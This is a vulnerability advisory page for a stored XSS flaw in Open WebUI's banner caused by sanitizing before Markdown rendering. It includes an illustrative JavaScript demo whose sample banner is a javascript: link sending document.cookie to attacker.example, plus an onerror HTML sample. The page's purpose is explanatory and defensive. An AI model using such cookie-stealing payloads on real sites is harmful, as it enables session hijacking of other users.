Description
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Banner component due to an improper sanitization order (specifically, DOMPurify is executed before the marked library). This vulnerability allows a compromised or malicious administrator to plant a malicious payload in the global banner. Crucially, this vector enables Privilege Escalation, as the malicious banner is rendered for all users, including the Super Admin (Primary Admin). Consequently, the payload successfully bypasses the existing security mechanism. An attacker can leverage this to steal the Super Admin's session token. This vulnerability is fixed in 0.8.0.
Published: 2026-05-15
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Open WebUI's Banner component contains a stored cross-site scripting flaw caused by running DOMPurify before the marked library: the sanitizer only ever sees the Markdown source, so any markup that marked generates from Markdown syntax afterwards never passes through it. An attacker holding an administrator account can store a script in the global banner, which is rendered for every user, including the Super Admin. Because the payload executes in the Super Admin's browser, an ordinary administrator can steal the Super Admin's session token and act with that account's privileges.
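The ordering problem, as an added example that is not Open WebUI's code and does not use the real DOMPurify or marked: toyMarkdownToHtml and toySanitize are minimal stand-ins constructed for this illustration, and the sample banners are constructed here, not payloads taken from the advisory. It shows why a Markdown link carrying a javascript: URL is invisible to a sanitizer that runs before the renderer, while the same sanitizer catches it once the order is reversed; raw HTML is caught in either order, which is why the bug is specific to markup the renderer itself generates.

```javascript
// Added illustration of the sanitize-then-render ordering bug (not Open WebUI code).
// toyMarkdownToHtml stands in for marked and toySanitize for DOMPurify; both are
// deliberately minimal and were constructed for this example.

// Stand-in for marked: turns [text](url) into an anchor and, like marked's default
// configuration, passes any raw HTML through untouched.
function toyMarkdownToHtml(md) {
  return md.replace(/\[([^\]]*)\]\(([^)\s]*)\)/g, '<a href="$2">$1</a>');
}

// Stand-in for DOMPurify: drops <script> blocks, on* event handlers and
// javascript: URLs in href/src. It only understands HTML tags, so Markdown
// link syntax is plain text as far as it is concerned.
function toySanitize(html) {
  return html
    .replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "")
    .replace(/\son\w+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi, "")
    .replace(/\s(?:href|src)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi,
      (attr, dq, sq, bare) =>
        /^\s*javascript:/i.test(dq ?? sq ?? bare) ? "" : attr);
}

// Vulnerable order: the sanitizer runs on the Markdown source and the renderer
// runs last, so markup the renderer generates is never inspected.
function renderBannerVulnerable(markdown) {
  return toyMarkdownToHtml(toySanitize(markdown));
}

// Fixed order: render first, then sanitize the final HTML that reaches the DOM.
function renderBannerFixed(markdown) {
  return toySanitize(toyMarkdownToHtml(markdown));
}

// Cheap check used below: does a javascript: URL survive the pipeline?
function containsScriptUrl(html) {
  return /javascript:/i.test(html);
}

// Constructed sample banners (not payloads from the advisory).
const BANNERS = {
  // Markdown link whose URL uses the javascript: scheme: plain text to a
  // sanitizer that runs before the renderer.
  markdownLink: "Maintenance window: [details](javascript:location='https://attacker.example/?c='+document.cookie)",
  // Raw HTML with an event handler: caught in either order, which is why the
  // bug is specific to renderer-generated markup.
  rawHtml: 'Notice <img src=x onerror="alert(1)">',
  // Benign link that must survive the fixed pipeline unchanged.
  benign: "Read the [docs](https://example.com/docs)",
};

// Runs every sample through both pipelines and reports whether a javascript:
// URL leaked; returns the rows so they can be checked programmatically.
function demo() {
  const rows = [];
  for (const [name, md] of Object.entries(BANNERS)) {
    rows.push({
      name,
      vulnerableLeaksScriptUrl: containsScriptUrl(renderBannerVulnerable(md)),
      fixedLeaksScriptUrl: containsScriptUrl(renderBannerFixed(md)),
    });
  }
  return rows;
}

console.table(demo());
```

The general rule the example demonstrates is that the sanitizer must be the last step before HTML reaches the DOM; with the real libraries that means sanitizing the renderer's output (DOMPurify.sanitize applied to the result of marked.parse), never its input.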

Affected Systems

The vulnerability affects all versions of the self-hosted Open WebUI platform prior to 0.8.0. Operators should verify the installed version and upgrade if they are running an earlier release.

Risk and Exploitability

The vulnerability has a CVSS 3.1 base score of 8.1 (vector CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N): the attacker needs high privileges (an administrator account) and a victim has to load a page that renders the banner, but the scope changes because an ordinary administrator ends up acting as the Super Admin. EPSS is below 1% (very low) and the issue is not listed in the CISA KEV catalog. Because exploitation requires an authenticated administrator, the likelihood depends on whether an attacker already holds, or can obtain, an administrator account. Once the banner payload is stored, every user who views the banner runs the script, which allows hijacking of the Super Admin's session.

Generated by OpenCVE AI on May 15, 2026 at 23:52 UTC.

Remediation

The advisory states that the issue is fixed in Open WebUI 0.8.0; no separate workaround is listed on this page.

OpenCVE Recommended Actions

  • Upgrade Open WebUI to version 0.8.0 or later to apply the security fix.
  • Restrict banner editing to a minimal set of trusted administrators, and protect those administrator accounts with strong authentication and monitoring, since the advisory's attacker is a compromised or malicious administrator.
  • After upgrading, review the current banner content for unexpected Markdown or HTML; if anything suspicious is found, treat Super Admin sessions as potentially exposed and invalidate them.
  • Deploy a strict Content Security Policy that blocks inline JavaScript and disallows unsafe sources to limit what any residual XSS payload can do. A CSP constrains the payload but does not remove a stored one, and a policy that blocks inline scripts may break the Open WebUI front end, so test it in report-only mode before enforcing it.


Advisories
Source: GitHub GHSA
ID: GHSA-cqp4-qqvg-3787
Title: Open WebUI has Stored XSS in Banner Component via Improper Sanitization Order
History

Fri, 15 May 2026 23:45:00 +0000

Type: First Time appeared
Values Added: Open-webui; Open-webui open-webui
Type: Vendors & Products
Values Added: Open-webui; Open-webui open-webui

Fri, 15 May 2026 22:00:00 +0000

Values Added:
Description: Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Banner component due to an improper sanitization order (specifically, DOMPurify is executed before the marked library). This vulnerability allows a compromised or malicious administrator to plant a malicious payload in the global banner. Crucially, this vector enables Privilege Escalation, as the malicious banner is rendered for all users, including the Super Admin (Primary Admin). Consequently, the payload successfully bypasses the existing security mechanism. An attacker can leverage this to steal the Super Admin's session token. This vulnerability is fixed in 0.8.0.
Title: Open WebUI: Stored XSS in Banner Component via Improper Sanitization Order
Weaknesses: CWE-79
References:
Metrics: cvssV3_1 {'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-15T21:42:34.264Z

Reserved: 2026-05-12T21:59:25.665Z

Link: CVE-2026-45665

Vulnrichment

No data.

NVD

Status : Received

Published: 2026-05-15T22:16:55.920

Modified: 2026-05-15T22:16:55.920

Link: CVE-2026-45665

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-16T00:00:12Z

Weaknesses